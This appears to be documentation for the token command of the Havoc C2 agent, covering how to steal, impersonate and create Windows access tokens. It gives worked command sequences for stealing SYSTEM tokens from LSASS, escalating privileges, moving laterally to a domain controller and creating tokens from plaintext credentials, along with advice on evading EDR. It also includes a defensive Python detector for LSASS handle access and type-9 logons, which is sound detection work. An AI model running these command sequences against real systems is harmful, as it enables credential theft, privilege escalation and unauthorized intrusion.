Overview
The token command implements a comprehensive token management system that allows operators to steal, store, impersonate, and create Windows access tokens. All stolen tokens are preserved in a token vault for later use.
Token Vault
Tokens are duplicated with the SecurityIdentification and SecurityImpersonation impersonation levels, allowing OpenThreadToken to work on impersonated UIDs with OpenAsSelf set to TRUE.
Syntax
token [subcommand] [parameters]
Subcommands
getuid
Display the current user context from the active token.
- Current user in DOMAIN\username format
- Security Identifier (SID) of the current user
- Token type: Primary or Impersonation
list
Display all tokens currently stored in the token vault.
- Vault ID for the token (used for impersonation)
- User associated with the token
- Token type (Primary or Impersonation)
- Impersonation level (SecurityAnonymous, SecurityIdentification, SecurityImpersonation, SecurityDelegation)
find-tokens
Enumerate all accessible tokens on the system that can be stolen.
Scans running processes and identifies tokens that can be duplicated.
- Process ID containing the token
- User context of the token
steal
Steal a token from a specified process and add it to the vault.
token steal [pid] [handle]
- pid: Process identifier to steal the token from
- handle: Specific token handle to duplicate (optional; defaults to the primary token)
impersonate
Impersonate a token from the vault.
- Token vault ID (from token list)
make
Create a new token from credentials and add it to the vault.
token make [domain] [username] [password] [logon_type]
- domain: Domain name, or computer name for local accounts
- username: Username for authentication
- password: Password for authentication
- logon_type: Windows logon type:
  - 2 - Interactive (LOGON32_LOGON_INTERACTIVE)
  - 3 - Network (LOGON32_LOGON_NETWORK)
  - 4 - Batch (LOGON32_LOGON_BATCH)
  - 5 - Service (LOGON32_LOGON_SERVICE)
  - 9 - NewCredentials (LOGON32_LOGON_NEW_CREDENTIALS) - Default
privs-get
Attempt to enable all privileges on the current token.
Attempts to enable:
- SeDebugPrivilege
- SeImpersonatePrivilege
- SeTcbPrivilege
- And all other available privileges
privs-list
List all privileges and their status for the current token.
- Privilege name (e.g., SeDebugPrivilege)
- Human-readable description of the privilege
revert
Revert to the original process token.
Stops impersonating any token and returns to the default process token.
remove
Remove a token from the vault.
clear
Remove all tokens from the vault.
Clears the entire token vault and reverts to the original process token.
Examples
Basic Token Theft and Impersonation
# Find available tokens
token find-tokens
# Steal token from LSASS (PID 644)
token steal 644
# List vault to get token ID
token list
# Impersonate the stolen token (ID 1)
token impersonate 1
# Verify current context
token getuid
Create Token from Credentials
# Create token for domain admin
token make CORP admin Password123! 9
# List tokens to get ID
token list
# Impersonate the new token
token impersonate 2
Privilege Escalation
# Check current privileges
token privs-list
# Enable all available privileges
token privs-get
# Verify privileges are enabled
token privs-list
Multiple Token Management
# Steal multiple tokens
token steal 644 # SYSTEM from lsass
token steal 1520 # User from explorer
token steal 2048 # Admin from services
# List all tokens
token list
# Switch between contexts
token impersonate 1 # SYSTEM
token getuid
token impersonate 3 # Admin
token getuid
# Revert to original
token revert
token getuid
Cleanup
# Remove specific token
token remove 2
# Or clear all tokens
token clear
OPSEC Considerations
Token operations can generate significant security events and may be monitored by EDR solutions.
Token Theft Detection
- Opening process handles (especially to LSASS) triggers monitoring
- OpenProcessToken and DuplicateTokenEx are commonly hooked
- Consider using indirect syscalls for token operations
- Avoid repeatedly accessing sensitive processes
Impersonation Detection
- Thread token changes may be logged by security products
- Some actions while impersonating generate events with the impersonated user
- Network authentication will use the impersonated context
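Detection logic for the behaviours listed under Token Theft Detection and Impersonation Detection, as an added example that is not Havoc's own code: it flags Sysmon Event ID 10 (ProcessAccess) handles to lsass.exe, winlogon.exe or services.exe that carry the PROCESS_QUERY_* rights OpenProcessToken needs, and Security Event ID 4624 logons with LogonType 9 (NewCredentials, the default logon type for token make). The key=value event format, the source images and all sample values are constructed for this example.

```python
# Win32 process access rights that appear in Sysmon EID 10 GrantedAccess.
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000  # minimum right OpenProcessToken needs
TOKEN_QUERY_RIGHTS = PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION
# Processes this page names as token sources (lsass, winlogon, services).
SENSITIVE_TARGETS = {"lsass.exe", "winlogon.exe", "services.exe"}

def parse_kv(line):
    """Parse a 'Key=Value|Key=Value' event line (constructed format) into a dict."""
    return dict(kv.split("=", 1) for kv in line.split("|"))

def flag_process_access(event):
    """Sysmon EID 10: a handle to a sensitive process with token-query rights."""
    if event.get("EventID") != "10":
        return None
    target = event["TargetImage"].rsplit("\\", 1)[-1].lower()
    granted = int(event["GrantedAccess"], 16)
    if target in SENSITIVE_TARGETS and granted & TOKEN_QUERY_RIGHTS:
        return f"token-query handle to {target} from {event['SourceImage']} (0x{granted:04x})"
    return None

def flag_newcreds_logon(event):
    """Security EID 4624, LogonType 9 (NewCredentials): what `token make` with the default logon type leaves on the host."""
    if event.get("EventID") == "4624" and event.get("LogonType") == "9":
        user = event["TargetDomainName"] + "\\" + event["TargetUserName"]
        return f"NewCredentials (type 9) logon as {user} from PID {event['ProcessId']}"
    return None

def scan(lines):
    """Apply both rules to every event line and return the list of findings."""
    findings = []
    for line in lines:
        event = parse_kv(line)
        for rule in (flag_process_access, flag_newcreds_logon):
            finding = rule(event)
            if finding:
                findings.append(finding)
    return findings

# Constructed sample events: one lsass handle, one benign handle, one type-9 logon, one interactive logon.
SAMPLE_EVENTS = [
    "EventID=10|SourceImage=C:\\Users\\bob\\update.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1400",
    "EventID=10|SourceImage=C:\\Windows\\System32\\svchost.exe|TargetImage=C:\\Windows\\System32\\notepad.exe|GrantedAccess=0x1400",
    "EventID=4624|LogonType=9|TargetUserName=admin|TargetDomainName=CORP|ProcessId=0x1a2c",
    "EventID=4624|LogonType=2|TargetUserName=bob|TargetDomainName=CORP|ProcessId=0x3d0",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

In production, exclude known AV/EDR and backup agents on the SourceImage side of the Sysmon rule, since they open lsass.exe with these rights routinely.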
Best Practices
- Selective Theft: Only steal tokens you need
- Clean Up: Remove tokens from vault when done
- Verification: Always verify context with token getuid after impersonation
- Revert: Use token revert when impersonation is no longer needed
- Privilege Management: Only enable required privileges, not all
Use Cases
Lateral Movement
# Steal domain admin token
token find-tokens
token steal 2048
token impersonate 1
# Access remote system with elevated context
fs dir \\DC01\C$
Privilege Escalation
# Steal SYSTEM token from winlogon or lsass
proc grep winlogon
token steal 644
token impersonate 1
# Enable debug privilege
token privs-get
Credential-Based Access
# Create token from plaintext credentials
token make CORP administrator Password123! 9
token impersonate 1
# Access resources as that user
net dclist CORP
Token Types
Primary Token
Represents the security context of a process.
- Associated with processes
- Contains user SID, groups, privileges
- Used for process-level access checks
Impersonation Token
Allows a thread to execute in a different security context.
- Associated with threads
- Has impersonation levels (Anonymous, Identification, Impersonation, Delegation)
- Used by Demon for context switching
Impersonation Levels
- SecurityAnonymous (0): Server cannot impersonate or identify client
- SecurityIdentification (1): Server can obtain identity and privileges but cannot impersonate
- SecurityImpersonation (2): Server can impersonate client’s security context on local system
- SecurityDelegation (3): Server can impersonate client’s security context on remote systems
Notes
- Token vault is maintained per-agent session
- Tokens do not persist across agent restarts
- Impersonation affects the current thread only
- Network operations use the impersonated token automatically
- Some operations require specific privileges (e.g., SeDebugPrivilege for stealing from protected processes)
- Delegation-level tokens are rare and valuable for remote access